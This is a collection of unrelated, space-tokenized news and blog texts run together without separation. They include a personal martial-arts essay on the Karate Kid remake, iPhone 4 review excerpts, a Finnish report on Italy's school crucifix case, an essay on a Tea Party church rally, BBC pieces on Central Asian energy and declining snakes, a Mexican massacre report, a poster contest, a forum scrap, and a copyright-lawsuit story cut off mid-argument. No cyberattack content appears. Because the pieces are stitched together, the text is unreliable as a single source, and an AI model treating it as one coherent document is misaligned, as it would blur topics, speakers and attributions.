In a decade glutted with Van Damme films , this was the most human of contemporary martial arts movies .
Apart from lacking Van Damme , it also , thankfully , lacked the overdramatized emotional displays common in classic Kung Fu films .
We see fear and adrenaline on Daniel - San 's face and in his body language in combat ; we see his awkwardness when he flirts with the cheerleader ; we see his embarrassment when he is thrown into sand by the Cobra Kai ; we see his bruises and injuries after scuffles .
All of these human shortcomings makes that little plastic Valley Karate tournament trophy so much more shiny , and his sweetheart 's love more sweet , in the end .
Sure , the fight choreography is great , but the story itself is greater for any young man who has found solace in the dojo , as I did .
I met my first bully when I went to school in Hong Kong for a year , not long after seeing Karate Kid for the first time .
The bully was a big , 9 - year - old Australian .
He picked on me constantly for being friends with a sweet 8 - year - old California girl .
I took karate , but no one taught me how to correctly tie the belt on my oversized uniform .
My pants fell off at every punch in one sequence we practiced .
The Australian giant had one last laugh before I flew back to America when the school year ended .
There was no victory , only surrender .
I did not practice karate again until my teenage years , but my return to the discipline happened just in time , saving me from hormone - driven angst after I scarfed a bunch of Advil in a mock suicide / heartbreak maneuver .
After hitting that ibuprofen bottom , I started up some Tae Kwon Do with my friends Mike and Pete .
I was n't gifted as an athlete or student , but it was pretty clear from the start that kicking and punching were what I did best .
Within a few weeks I could kick tops of doorstops with vertical sidekicks and full splits .
We lifted weights , took classes , watched tapes and taught each other Kung Fu , Judo , Jujitsu and Shotokan Karate on cheap foam mats .
My height and weight were identical to those of Bruce Lee .
Unlike Daniel - San , I will admit that I did not always use my gifts exclusively for self - defense .
But in an environment of widespread juvenile vengeance and pride , each of my strikes seemed fair at the time .
The first person I ever punched was Shawnee Alexandri .
You could n't call him a bully , but he was an antagonistic motormouth .
After asking him countless times to shut up , I gave him a right cross and put him in a headlock in the school weight room .
Everyone turned around , surprised .
I was surprised , too : at how pliant the human face could be when it swung around on a human neck , and how much being jacked - up on adrenaline made me lose fine motor skills .
As long as you do n't hit teeth or the top of the head , you will not get hurt .
The captain of the football team told me it was " kind of a good punch " before the room returned to normal .
That move must have seemed shocking to onlookers , coming from a skinny little honor class geek with broken glasses .
I had just broken high school cliché rules ( and quite nearly some of Shawnee 's teeth ) .
Before graduation , I would go on to threaten to drop - kick the captain of the football team for picking on my little brother , and would slide - tackle the school bully during gym class for kicking my shins one too many times .
Anyone who picked on me once never picked on me again .
I never got in trouble , because kids in smart people classes just did n't get detention .
Most importantly , I 'd worked out the self - pity and when I clenched my fist , I felt a spark of self - worth .
I believed I could will myself to overcome problems in life .
Just like the Karate Kid .
I went through college in an an unspectacular way .
I went to a mediocre school , got mediocre grades , and had a mediocre time .
I picked up a few skills but practiced nothing .
I expected to grow up , but it did n't happen .
I got fat .
Like Daniel - San , I picked up my East Coast roots and moved to California .
I found a gym , the Fairtex Muay Thai school in San Francisco run by boxers from Bangkok who had all come from poverty and risen to championships ( the recruiters only recruit the poor , because , like Mike Tyson , they fight harder . )
When I was laid off after the first internet bubble burst , all of the people who were fired alongside me were upset .
Some cried .
I could only think of the gym .
I worked full - time there , mopping floors .
In a few months I was training , teaching and sparring almost every day , and I remember how content I was sitting under a skylight drenched from the routine of exercise , about to start teaching class .
I remember thinking to myself , " I will never be more happy than I am right now . "
And although I have been happier , life was never more simple .
The head instructors were all gentle , strong , hilariously perverted , and generous with their knowledge .
They , unlike the Americans at the gym , were n't there because they were afraid of life .
For them , this was n't therapy to work out aggressive tendencies .
They did this because they had the skill , and because they began with no better options in life .
They were Mr. Miyagis who would grab your nuts when you were n't paying attention in order to teach you how to pay attention .
It ended quickly .
One June , three years into this part of my life , I had the perfect exhibition match .
I could feel where every punch and kick were coming from , and I kept complete composure .
I was far from the best , but I felt that day I 'd reached the level I wanted to reach .
A few weeks later , I witnessed the owner of the gym get shot while chasing down a plain - looking guy who backed into his parked car out in the alley behind the gym .
That plain - looking guy happened to be a serious criminal who 'd skipped parole meetings for a year .
I tried to give the gym owner CPR , but as they took his body off the street , wrapped in my t- shirt ( I remember it had a phoenix logo ) , something changed inside .
I did n't want to live by the sword anymore .
Two days later , the murderer shot himself in a standoff with police after a widely publicized manhunt , and round - the - clock media coverage .
The gym closed .
I thought I could approach something more meditative .
I took some Aikido classes to learn how to draw the sword and cut , but I did n't have the heart for it now .
I had to leave it , and everyone in that world , behind .
I no longer believed it was the way .
I broke my leg in a motorcycle accident and although the metal rod in my left tibia makes the bone stronger , every time I kicked the ankle went numb .
I was finished .
I began focusing instead on writing .
It 's been years since I 've practiced martial arts .
But having studied a few different types , I guess you could say everything I do is done with as much martial spirit as I can muster .
From the way I think , or move , from cooking to writing to running Gizmodo , to surfing , I have practiced enough that the best and worst lessons have become part of who I am .
When something runs this deep , and when you 've observed and practiced more than a few types of martial arts , its hard to understand why some people on the internet would raise such a fuss over the new Karate Kid movie being focused around Kung Fu instead of Karate .
Muay
Thai is a brutal art .
It involves knees , shins , elbows , and gloves on the fists .
In the old days , I was told , fighters would dip their taped fists into broken glass– but today , it 's more of a graceful and tough sport .
There are rules : no eye gouges or groin kicks .
Its square stance and blocks are mostly meant to deflect round strikes from the sides or quick jabs to the face and body– and because of that , you could say Muay Thai has a weakness to strong spinning back kicks .
They are n't an official part of Muay Thai , but no one winces when you do them because it is not as cultish of a sport as other more traditional martial arts .
Still , a Muay Thai practitioner would n't necessarily know how to use or defend against these kicks .
I know this because of my experience in other martial arts .
And I know this because of Jongsanan Fairtex .
Jongsanan Fairtex 's nickname is " the wooden man . "
He was one of the most decorated fighters in the gym , and was ranked by some publications in Thailand as one of the top 10 fighters of all time .
If I remember correctly , his record was 98 - 28 - 0 , and he 's best known for a match referred to as " the elbow fight " , where he and his opponent traded elbow smashes to each other 's crowns repeatedly , with neither man going down .
One of Jongsanan 's moves , which he'd throw in every couple of fights when he knew his opponent was on his heels or the ropes , was the spinning back kick .
It was sometimes effective , but it's also demoralizing to see your opponent break a rule of Muay Thai and turn his back to you .
As a master , Jonsanan knew when to break the rule of the system and throw some jazz into the equation .
So , with Jongsanan in mind : Okay , the title of the " new " Karate Kid title may be a misnomer in the literal sense .
But I do n't consider the title a mistake .
Some may argue that the filmmakers are demonstrating cultural insensitivity to Chinese and Japanese martial artists .
But I believe the Karate / Kung Fu discrepancy can also be interpreted as masterful perception .
Because a master , like Bruce Lee or Jongsanan , knows that at the core , there is no real difference between any of the martial arts .
In fact , this is the very sort of provincial distinction Bruce Lee fought against throughout his life .
All martial arts operate on the same fundamentals , more or less .
Each has a different emphasis on legs , feet , hard crushing or soft flowing styles , feints and slips or direct blocks .
Each art has strengths and weaknesses .
But the principles within each art are the same : efficient movement , focused minds , and strong spirits .
When you understand that , there 's no sense in fussing with the rules just for the sake of the rules .
Was Jongsanan , one of the defining fighters of this last 100 years , not doing Muay Thai when he did spin kicks ?
Or did he just reinvent Muay Thai when he threw that move in , during a few of his fights ?
The correct title of the martial art in question hardly matters when your enemy is sprawled at your feet , knocked out by an attack with no name .
The Karate Kid , released as The Kung Fu Kid in China and Japan , opens today in theaters .
The first reviews dropped Tuesday evening for the iPhone 4 , the latest smartphone from Apple .
The consensus ?
All are favorable so far .
The first reviews dropped Tuesday evening for the iPhone 4 , the latest smartphone from Apple .
Apple gave five media outlets 
The Wall Street Journal , The New York Times , Engadget , USA Today , and BoingBoing  its seal of approval for early review units .
Each reviewer has given Apple extremely positive marks , with both the Journal 's Walt Mossberg and Engadget 's Joshua Topolsky saying the device is the best smartphone on the market .
They all are happy to report that the phone is an improvement over the iPhone 3GS , but all of the reviewers were pretty harsh on AT&T 's service .
If you receive your unit today and have a chance to test it out , please let us know in the comments .
Reviews :
Walt Mossberg , Wall Street Journal
Best New Feature : FaceTime video calling
" Video calling is one of this device 's best features .
As noted , it currently requires an iPhone 4 and Wi-Fi connection on both ends , though Apple says it is making the technology free to others and hopes to have millions of compatible devices .
There is no setup and nothing to learn .
You just press a FaceTime button , and if the other person accepts the invitation to talk face to face , his or her image appears , with your own image showing in a small corner window . "
Biggest Downside : AT&T
" The most important downside of the iPhone 4 is that , in the U.S. , it 's shackled to AT&T , which not only still operates a network that has trouble connecting and maintaining calls in many cities , but now has abandoned unlimited , flat - rate data plans .
Apple needs a second network . "
Bottom Line :
" In both hardware and software , it is a major leap over its already - excellent predecessor , the iPhone 3GS Apple has built a beautiful smartphone that works well , adds impressive new features and is still , overall , the best device in its class . "
David Pogue , New York Times
Best New Feature : FaceTime video calling
" It 's not the first phone with both a front and back camera .
It 's not even the first one to make video calls .
But the iPhone 4 is the first phone to make good video calls , reliably , with no sign - up or setup , with a single tap .
The picture and audio are rock solid , with very little delay , and it works the first time and every time .
This feature , called FaceTime , is pure Apple . "
Biggest Downside :
None .
It 's pretty much all good .
Bottom Line :
" Now , the iPhone is no longer the undisputed king of app phones .
In particular , the technically inclined may find greater flexibility and choice among its Android rivals , like the HTC Incredible and Evo .
They 're more complicated , and their app store not as good , but they 're loaded with droolworthy features like turn - by - turn GPS instructions , speech recognition that saves you typing , removable batteries and a choice of cell networks
If what you care about , however , is size and shape , beauty and battery life , polish and pleasure , then the iPhone 4 is calling your name . "
Joshua Topolsky , Engadget
Best New Feature :
The new screen
" Steve made a huge point about the science behind this technology during his keynote , claiming that the resolution of the screen essentially tops what is perceivable by the human eye .
There have been some debates as to whether or not this argument holds water , but we can tell you this : to our eyes , there has never been a more detailed , clear , or viewable screen on any mobile device . "
Biggest Downside : FaceTime 's limits
" Right now , there 's only one way to do FaceTime calls , and that 's via the iPhone 4 ... and only over WiFi , which means that the opportunity to make these calls is pretty limited for now .
Additionally , in our testing , we found that you really need to have a good , strong , nearby WiFi signal to hang onto a connection . "
Bottom Line :
" We 're not going to beat around the bush -- in our approximation , the iPhone 4 is the best smartphone on the market right now .
The combination of gorgeous new hardware , that amazing display , upgraded cameras , and major improvements to the operating system make this an extremely formidable package .
Yes , there are still pain points that we want to see Apple fix , and yes , there are some amazing alternatives to the iPhone 4 out there .
But when it comes to the total package -- fit and finish in both software and hardware , performance , app selection , and all of the little details that make a device like this what it is -- we think it 's the cream of the current crop . "
Ed Baig , USA Today
Best New Feature : FaceTime video calling .
" The killer feature is what Apple calls FaceTime video chat .
The promise that you and the person you 're talking to on a phone can gaze into each other 's eyes dates back to when LBJ occupied the White House .
No one has really nailed video calling through the years , at least not the way Apple has nailed it here . "
Biggest Downside : A small grab bag of minor complaints .
" Apple 's public dissing of Adobe Flash means you 'll still come upon Web video sites that do n't make nice with the iPhone .
I had a few dropped calls .
The battery still is n't user - replaceable , and there 's no slot for expanding memory . "
Bottom Line :
" As with previous iPhones , the latest model breaks new ground .
FaceTime video calling on the iPhone 4 is one of those cool " seeing is believing " features , and it arrives on top of several across - the - board enhancements .
And iOS 4 is a mostly terrific software upgrade .
Cutting through the hype , Apple has given longtime diehards , and first - time iPhone owners , plenty to cheer about . "
Xeni Jardin , BoingBoing
Best New Feature : 720 p video recording
" I 'm very , very excited about the video capabilities in iPhone 4 .
I 've spent the last few years of my life working in web video , so forgive me if I " squee " here .
The higher definition video [ 720p ] is spectacular , and far better in quality than what was possible with iPhone 3GS ( or , as far as I 've seen , with any smartphone ) . "
Biggest Downside : AT&T
" There 's one flaw it can't completely eliminate : the unreliable quality of calls placed over AT&T , which remains the iPhone 's only U.S. carrier . "
Bottom Line :
" The fourth incarnation of Apple 's iPhone is an incrementally improved , familiar device not a new kind of device , as was the case with the recent introduction of iPad .
Yes , the notable features with iPhone 4  both the device and the iOS4 , which came out yesterday in advance of the iPhone itself are mostly tweaks .
But what tweaks they are : Apple 's focus on improvement is as much key to the quality of its products as innovation . "
Viime marraskuussa Strasbourgin tuomioistuin vastasi myönteisesti suomalaissyntyisen äidin , Soile Lautsi-Albertinin valitukseen , joka koski Italian kouluissa olevia krusifikseja .
Tuomion mukaan luokkien krusifiksit vahingoittavat vanhempien oikeuttaa kasvattaa lapsiaan omien vakaumustensa mukaisesti .
Italian mielestä ihmisoikeustuomioistuimen tekemä päätös ei kuitenkaan kunnioita jäsenmaiden uskonnollisia perinteitä eikä oikeutta päättää asioista paikallisesti .
Siksi Italia valitti päätöksestä .
Krusifiksi-kiistaa käsitellään Euroopan ihmisoikeustuomioistuimen suuressa jaostossa 30 . kesäkuuta .
Kyseessä on ennakkotapaus .
Kymmenen EU - maata tukee Italiaa
Italia on pyytänyt muita maita tukemaan Euroopan ihmisoikeustuomioistuimeen tekemäänsä valitusta .
Tähän mennessä kymmenen Euroopan neuvoston jäsenmaata on ilmoittanut tukevansa Italiaa .
Ne ovat kaikki katolisia tai ortodoksisia maita .
Myös Suomen ulkoministeri Alexander Stubb on saanut Italialta tukipyynnön .
Italian ulkoministerin Franco Frattinin kirjeen ulkoministeriöön toi Italian suurlähettiläs Elisabetta Kelascian .
Viestin toimittamistapa alleviivaa sen tärkeyttä .
Suomi ei kuitenkaan aio ottaa asiaan kantaa kesken oikeudenkäynnin .
Ihmisoikeustuomioistuimeen voivat valittaa yksityishenkilöt , ryhmät tai kansalaisjärjestöt , mutta nyt Italian valtio puuttuu tuomioistuimen toimintaan .
Poliisit huolehtivat krusifikseista valittaneen Soile Lautsi-Albertinin turvallisuudesta
Koulujen krusifikseja koskevan jupakan takana on katolisen kirkon vaikutusvalta Italian politiikassa .
Italian hallitus on läheisessä yhteistyössä katolisen kirkon ja Vatikaanin kanssa , vaikka periaatteessa Italian katolinen kirkko ei ole valtiokirkko .
Italiassa asuu runsaat neljä miljoonaa eri uskontoja edustavaa maahanmuuttajaa , mutta heidän lapsilleen Italian koulu ei usein anna vaihtoehtoja .
Koulujen krusifikseista valituksen tehnyt Soile Lautsi-Albertini elää Venetsian ympäristössä sijaitsevassa Veneton maakunnassa .
Siellä katolisen kirkon näkemys on saanut tukea ulkomaalaisvihaa levittävältä hallituspuolueelta , Pohjoisen Liitolta .
Soile Lautsi-Albertinin ja Massimo Albertinin perhe on joutunut kokemaan niin jyrkkää vihamielisyyttä omassa kaupungissaan , Abano Termessä , että poliisit huolehtivat heidän turvallisuudestaan .
Oikeuden päätös krusifiksi- kiistasta tullee ensi vuodenvaihteessa .
Mikäli päätös kieltää krusifiksit Italiassa , täytyy uskonnollisten symbolien käyttöä tarkastella uudelleen myös Suomessa .
Ihmisoikeustuomioistuimen suuren jaoston päätöksestä ei voi enää valittaa .
Lähteet : Radion kulttuuriuutiset / Liisa Liimatainen , Rooma
For those who wonder about the religious dimensions of the Tea Party movement , an event earlier this month at Faith Baptist Church in Deltona , Florida , looked pretty much indistinguishable from the 1980s era church - based political organizing efforts of the religious right .
As each local candidate spoke at the Deltona 912 Patriots event , it was clear how profoundly conservative , Republican , and Christian ( in the exclusivist conservative sense of Christian ) this gathering was .
But there was a twist , born of the Tea Party ’s efforts to run from the racist and violent imagery and rhetoric in its ranks .
The banner on the Florida Tea Party Web site read :
9 - 12 Project : not racist , not violent , just not silent anymore .
The event was in a more rural part of Florida than where I live and I passed a number of confederate flags on my way there .
I expected an all white crowd making arguments about “ reverse discrimination , ” libertarian arguments against violations of state sovereignty , especially with regard to the Civil Rights Act , and maybe even some of the “ slavery was n’t as bad as people say ” arguments .
Not so much .
Do n’t Like History ?
Make Up Some of Your Own
The keynote speaker was Frantz Kebreau of the Florida - based National Association for the Advancement of Conservative People of all Colors ( that ’s right : NAACPC ) , who has been traveling the Tea Party circuit with his alternative history of racism and slavery in America .
The NAACPC maintains that the “ once - great NAACP has become a negative , shameful tool of the left : overseers committed to keeping their fellow blacks dependent and subservient to the Democrat party . ”
According to the NAACPC ’s Web site , Kebreau believes “ Identity Politics , race , white guilt , political correctness and racism are the means by which Socialism through entitlements will bring our Country down . ”
In his lectures , the site promises ,
Frantz exposes the hidden history that the Radical Left , Progressives and Democrats do not want you to know about .
Hold on because the information you will receive is virtually impossible to find in the history books .
Kebreau ’s biography warns that the progressives and socialists are “ are rewriting history as we speak ” so they can “ bring Socialism to the United States of America , ” and promises that his truth - telling “ will set you free ! ”
His audience at Faith Baptist was not unaccustomed to revisionist history .
Sitting in the sanctuary decked in patriotic trimmings — eight big flags on the wall , bunting covering altar area , and a collection of small flags on the altar itself — the assembled activists discussed home schooling , David Barton ’s seminal revisionist work on “ American ’s Christian Heritage , ” all while Copeland ’s “ Fanfare for the Common Man ” played over the sound system .
There did n’t seem to be any of those secular , libertarian tea partiers here .
In fact , if the people at Faith Baptist abandon the Republican Party , it will likely be for the Reconstructionist - oriented , more conservative Constitution Party .
The Tea Party - supported candidates for local office all invoked the “ Christian American history ” and the “ religion of the founders . ”
The “ principles ” of the 9/12 Project , the brainchild of Glenn Beck , are a distillation of those found in W. Cleon Skousen ’s 1981 book , The Five Thousand Year Leap , to which the speakers repeatedly referred .
Although Beck has been responsible for its recent resurgence , the book has long been a favorite for Christian schools and home schoolers ( and among Reconstructionists — though Skousen himself is a Mormon , free market , Austrian school guy ) .
So , Slavery Was Not About Race ?
As I understand it , the fight over the degree to which America was “ founded as a Christian Nation , ” is a fight over our mythic understanding of ourselves .
I do n’t mean myth in the popular sense — as in “ myths are widely held to be true but actually are not . ”
Rather , I mean myth in the technical sense : narratives though which groups of people construct a sense of themselves and perpetuate that sense throughout the culture and to successive generations .
Kebreau ’s presence at this event signaled a new development in the religious right ’s myth - making .
In Kebreau ’s narrative , racism is a legacy of slavery but not a cause : instead , racism was a socially - onstructed mechanism by which people in power divided , threatened , and manipulated both blacks and whites to support slavery .
Many of the pieces of historical data he marshals in favor of this thesis are not unfamiliar to those of us who have studied this aspect of American history , although they are probably not as well - known among Americans in general : some slave owners were also black , not all slaves were black , black Africans played a huge role in the slave trade , very few Southerners actually owned slaves .
Most often , though , I hear these points made in argument from white Southerners — in a way that preserves the “ us ” and “ them ” division among black and white Americans — who just want the issue of slavery and racism to just go away .
These points are usually presented with a specific subtext : some slave owners were also black ( so why are you blaming us ? ) ; not all slaves were black ( and white people experience just as much racism today ) ; black Africans played a huge role in the slave trade ( “ they ” did it to “ us ” too ) ; very few Southerners actually owned slaves ( so why does it have to be such a big deal ? ) .
But Kebreau ’s subtext is different : he argues that slavery was not really about race .
He says some slave owners were also black ( so it was n’t about race ) ; not all slaves were black ( so it was n’t about race ) ; black Africans played a huge role in the slave trade ( so it was n’t about race ) ; very few Southerners actually owned slaves ( so how did they convince the rest of them to go to war and die to defend the “ property ” of a few rich people ) ?
They did so , according to Kebreau , by developing and perpetuating racial divisions among people who would n’t , otherwise , have had an interest in the fight .
He traced the ways in which the institution of slavery developed in the colonies , becoming increasingly race - based over time and accompanied by racist laws and customs that preserved it .
Or to put it the way he does , how the “ color line got darker and darker , ” all in the interest of fostering racism to preserve the power , wealth and status of a few .
Kebreau convinced a white Southern audience who would likely insist that the “ war of Northern aggression ” was not about slavery to be “ proud of America ” in which nearly two - thirds of a million people gave their lives in a war to end slavery .
He took an audience of Southerners and led them to claim the vision of the North .
He took an audience of white Christians who would have opposed a Martin Luther King holiday , and had them shouting “ amen ! ” and cheering him on from the pews like members of the AME , as he talked about Martin Luther King ’s dream and the March on Washington .
He moved the audience from the view that the Civil Rights Acts were an intrusion of government into realms in which it did not belong , to the view that they should be proud to be Republicans because Republicans introduced those bills and passed them , over the opposition of Democrats !
( You could almost hear them saying , “ Damn those Democrats . ”
Of course , the Democrats that opposed these measures have long - since moved to the Republican Party and , though the Republican party of another era freed the slaves , more contemporarily they also launched the divisive “ Southern strategy . ” )
So while explicit , traditional “ God and Country ” religion was everywhere at this event , so was the less explicit construction of a new “ creation myth ” for the Republican Party ’s American civil religion .
I could n’t help but marvel at power of myth to unite a group of people in agreement about what ’s wrong , whose fault it is , and how an election could be used to fix it .
Image caption Russia pumps oil from Kazakhstan to a Black Sea port for export
A year ago , the Kremlin issued a stark warning : that growing competition for control of global energy resources could spark wars on Russia 's borders , including those in Central Asia .
" Problems that involve the use of military force cannot be excluded , that would destroy the balance of forces close to the borders of the Russian Federation and her allies , " said a key Kremlin strategy document assessing the main security threats of the coming decade .
Just 20 years ago , Russia and the energy - rich countries of Central Asia , such as Kazakhstan and Turkmenistan , and Azerbaijan in the South Caucasus , were all united , as parts of the Soviet Union .
Moscow would have had unfettered access to their oil and gas reserves .
But the Central Asian states realise one of their greatest strategic strengths as independent countries is playing off the big global powers now scrambling to buy their precious energy supplies .
So , Moscow now finds itself in fierce competition with the big players : China , the US and Europe .
" Russia 's overall position in Central Asia is shrinking , " says Mikhail Kroutikhin , editor - in - chief of the Russian Energy Weekly .
" Russia is in retreat and the Chinese are jumping on the big opportunities . "
New ' Great Game ' ?
Rivalry in the region is often compared with the 19th Century British - Russian imperial rivalry nicknamed the " Great Game " .
Image caption China 's president officially opened the Turkmenistan - China gas pipeline
The past year has seen some key moments in the new energy " Great Game " in Central Asia , with the first pipelines being commissioned that take oil and gas east to China , instead of north and west .
From Kazakhstan , 200,000 barrels of oil are now being pumped every day across the border into the western Chinese province of Xinjiang , and there are plans to double this pipeline 's capacity .
From Turkmenistan , a pipeline carrying gas to China via Uzbekistan and Kazakhstan was opened last December by the Chinese President Hu Jintao .
It could satisfy around half of China 's current demand by the time it reaches full capacity in 2013 .
Turkmenistan 's President Kurbanguly Berdymukhamedov called the deal " political " as well as commercial and heaped praise on China 's " wise policy " , saying it had become " one of the key guarantors of global security " .
Turkmen tensions
With this agreement , Russia 's stranglehold on supplies from Turkmenistan , which has the fourth - largest reserves of gas in the world , was broken .
And while China and its new Central Asian energy partners were locking themselves in an ever - warmer embrace , Moscow found itself at loggerheads with its erstwhile client state .
Having agreed two years ago to pay a much higher price for Turkmen gas , to ensure it remained a loyal supplier , the Russians suddenly shut the taps 12 months ago , causing the pipeline to explode .
Analysts believe Moscow had decided it did not need the gas because of the downturn in global demand and prices during the economic crisis .
Even now it is only taking a third of what it was expected to buy , angering the Turkmen government and pushing it further into the arms of the Chinese .
Oil production Oil reserves Oil production - 2008 Proven oil reserves - 2008
Gas production Gas reserves Gas production - 2008 Proven gas reserves - 2008
Who will feed Nabucco ?
" As regards Russia 's role in the region , it has taken a step back in energy , " says Chris Weafer , chief strategist at Uralsib Bank in Moscow .
He believes it was not just the global economic crisis that prompted this .
It was also , he says , because Europeans searching for gas supplies for their planned Nabucco pipeline were offering much higher prices for Central Asian gas .
" The game changed because of Nabucco .
Up to 2006 , Russia could buy cheap gas from Turkmenistan , Uzbekistan and Kazakhstan - $ 50 for 1,000 cubic metres and then sell it to Europe for $ 250 .
" But from the start of 2008 , Russia had to agree to pay European prices - $ 300 per 1,000 cubic metres . "
" Gazprom was not making any money out of it .
So the political will to be involved has abated .
Russia has let the Chinese into Central Asia . "
And that is something Moscow may ultimately come to regret , because it also wants to be a major supplier of oil and gas to China .
With China already heavily investing in the two most important Central Asian energy suppliers , Turkmenistan and Kazakhstan , Russia may struggle to compete .
China flexes its muscles
Moscow has had agreements with Beijing to build a gas pipeline into China since 2002 , but the two sides have been haggling ever since over the price of the gas supplies .
Analysts say a deal may finally have been done - on the condition that the gas comes from a field and pipeline that are exclusively for Chinese use .
Officials also hope the first oil pipeline between the two countries will be completed by the end of this year .
But some analysts question whether Russia will have sufficient reserves to supply the gas pipeline , given the expected decline in its production over the next 20 years and the lack of investment in new fields since the collapse of the Soviet Union in 1991 .
" It [ the pipeline to China ] will have to tap reserves already going to Europe , " says Mikhail Kroutikhin .
" It is not economic , but Prime Minister Putin wants it to be built . "
South Stream
Another project which Mr Putin is determined should go ahead is Russia 's South Stream gas pipeline , across the Black Sea and into the heart of the European Union .
The rivalry between this and Europe 's alternative plan - the Nabucco pipeline - is one of the most intense in the Caspian Sea region .
The Europeans , who want to break free from their growing dependence on Russian energy supplies , desperately need supplies from the region to make the Nabucco pipeline viable .
And the Russians are trying to thwart this .
One key battleground is Azerbaijan , which has yet to declare whether it will feed Nabucco with its gas .
Its decision is critical .
UPDATE : A few people have said that a week is not long enough so how about for the first one I make it until the 31st March ?
I was going to say that this is based on the idea Warren Ellis has started over on his blog where he gives design challenges in the REMAKE / REMODEL thing .
I ’ve just taken the whole idea as I think it is so good .
Hope that ’s okay Mr Ellis .
Hopefully I ’ll get at least one response .
Fingers crossed there will be more and it can become a weekly thing
Here is the first one :
You are a film poster designer and have been asked to put together a poster for a new film called Robocop .
The only info you have about it :
- A policeman is gunned down by criminals
- A corporation take his body and improve it through the technology of the time to fight crime
- He has no memory of his past
- He has a gun in his leg
- There is an alternate technologically advanced policeman called ED - 209
It could be set in any era and is yet to be cast – you can choose the actors and director .
You have until 31st March .
From badly drawn mayhem to super slick graphic design , all entries are welcome .
Post your posters over on the Forum – the best ones will get shown on the Live for Films website ( all submissions are the property of the artist who did them , but having a go means you ’re saying it is okay for me to post your poster on the LFF site – cheers ) .
Join the Forum here .
Spread the word and happy drawing .
CIUDAD JUAREZ ( Reuters ) - Armed gunmen burst into a drug recovery clinic in the northern Mexican city of Chihuahua and killed 19 young addicts , the latest in a wave of attacks on drug rehabilitation centers near the U.S. border , police said Friday .
Two dozen men armed with automatic weapons entered the “ Faith and Life ” clinic identifying themselves as police late Thursday night .
They grabbed the 19 patients , aged between 18 and 25 , lined them up execution - style and opened fire .
Police found almost 200 bullet casings from different kinds of guns at the scene .
More than 23,000 people have died in drug- related violence in Mexico since President Felipe Calderon took office in late 2006 and declared war on drug cartels .
Violence in northern states like Chihuahua has exploded with brazen shootouts and massacres as cartels battle security forces and fight each other for valuable smuggling routes to the United States .
Police said Thursday ’s attack was the worst single act of drug war violence to hit Chihuahua , an industrial manufacturing center and the capital of Chihuahua state , also home to the country ’s worst drug hotspot , Ciudad Juarez .
Calderon , in South Africa to see Mexico play in the opening game of the soccer World Cup , condemned the killings .
“ ( These ) are outrageous acts that reinforce the need to fight with the full force of the law criminal groups carrying out such barbarism , ” he said in a statement .
Ciudad Juarez , so overrun by drug violence it is now considered one of the world ’s most violent cities , has seen similar attacks on drug rehab centers as cartel gunmen hunt down rival dealers .
Hooded gunmen have stormed at least seven rehab clinics in the city since early 2008 .
Two back - to - back strikes last September killed 28 people .
Cartels , mainly focused on U.S. narcotics consumers , are increasing battling to provide drugs to home - grown addicts , creating new turf wars that threaten to further stretch the country ’s security forces .
Originally Posted by technobob Originally Posted by
Do n't get your hopes up if the release will be like it was for Mac lacking many of the features that makes uTorrent so great on Windows .
Even now that it 's been a while since the release for Mac it 's still missing a lot of features .
By Richard Black
Environment correspondent , BBC News
The Royal python is one of the species showing a big decline Snakes may be declining across the world , according to a global study .
Researchers examined records for 17 snake populations covering eight species over the last few decades , and found most had declined markedly .
For reasons that are not entirely clear , some populations shrank in number abruptly around 1998 .
Writing in the journal Biology Letters , the researchers describe the findings as " alarming " but say much more work is needed to understand the causes .
" This is the first time that data has been analysed in this way , and what we 've shown is that in different parts of the world we seem to have this steep decline in a short period , " said project leader Chris Reading .
" It surprised us when we realised what we were looking at , " he told BBC News .
" And we do n't have a clue what it was about that period of time ( around 1998 ) . "
Dr Reading 's team at the UK's Centre for Ecology and Hydrology ran the study with institutions in Australia , France , Italy and Nigeria .
Data deficiencies
With so many populations in different places showing decline , it 's more than co-incidence
Chris Reading
The main problem for anyone wanting to conduct a global survey such as this is simply lack of data .
Monitoring snake populations means marking the individuals in some way - typically by snipping a pattern into their scales , or implanting a microchip .
Field seasons can last for many months , and have to be repeated annually .
The researchers believe they amassed most , if not all , long - term datasets for this study - although " long - term " in this context means going back more than one decade , in some cases more than two .
Nevertheless , within this relatively short timeframe , eight of the 17 populations were seen to fall markedly in size - some by more than 90 % - with only one showing any sign of a rise .
Species in decline include the asp and the smooth snake from Europe , the Gabon viper and rhinoceros viper of West Africa , and the royal python .
Many of the studies involve tagging snakes so they can be followed Populations shrank even in protected areas , suggesting that the progressive loss of habitat for wild animals being seen all over the world is not the only cause .
Similar steep declines observed in frogs and newts in an earlier period were eventually found to be caused by the fungal disease chytridiomycosis .
The year when many of the snake declines began - 1998 - raises the question of whether climatic factors might be involved , as very strong El Nino conditions contributed to making it the hottest year recorded in modern times .
Dr Reading 's research group suggests many causes might be involved , and is appealing to other researchers to come forward with any more long - term datasets that might broaden the picture .
" The purpose of this paper was to say ' this is what we 've found ' , and to say to other herpetologists ' now go and look at your own data ' , " he said .
" But I think that with so many populations in different places showing decline , it 's more than co-incidence . "
Richard .
Black-INTERNET@bbc.co.uk
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The US Copyright Group , a business name for the group of Virginia lawyers filing suits against tens of thousands of alleged US peer - to - peer movie downloaders , has been sharply criticized by the EFF and ACLU for suing up to 5,000 anonymous defendants at once .
The suits were " improperly joined , " said the groups .
At least one of the federal judges overseeing these cases wanted to hear more , telling lawyers from Dunlap , Grubb , & Weaver to convince her that all of the anonymous defendants had participated in the same transaction .
Yesterday , lawyer Tom Dunlap tried his hand at the task , filing a 29 - page document in the Washington , DC District Court .
According to Dunlap , suing 5,000 anonymous users at once is proper because of how BitTorrent works .
Also , his firm is actually doing all these " John Does " a favor by " giving all Doe Defendants the ability to defend the case in one jurisdiction , e.g. the ability to combine or join other Doe Defendants ’ filings and the ability to receive uniform decisions by the Court . "
One of these is not like the others
Dunlap 's basic argument distinguishes BitTorrent from all other P2P networks .
While some courts previously frowned on joining P2P defendants in cases involving LimeWire or KaZaA , BitTorrent is different and should be held to a different standard .
" Unlike the older P2P protocols , each new file downloader is receiving a different piece of the data from each user who has already downloaded that piece of data , all of which pieces together comprise the whole .
This means that every ' node ' or peer user who has a copy of the infringing copyrighted material on such a network — or even a portion of a copy — can also be a source of download for that infringing file , potentially both copying and distributing the infringing work simultaneously .
" Essentially , because of the nature of the swarm downloads as described above , every infringer is simultaneously stealing copyrighted material through collaboration from many other infringers , through a number of ISPs , in numerous jurisdictions around the country . "
Some older networks relied on direct downloads ; a user wanting a copy of song might download the entire song from some other users who had a copy already .
" Each particular act of infringement involved a specific one - on - one connection between two users for that specific file , " says the brief .
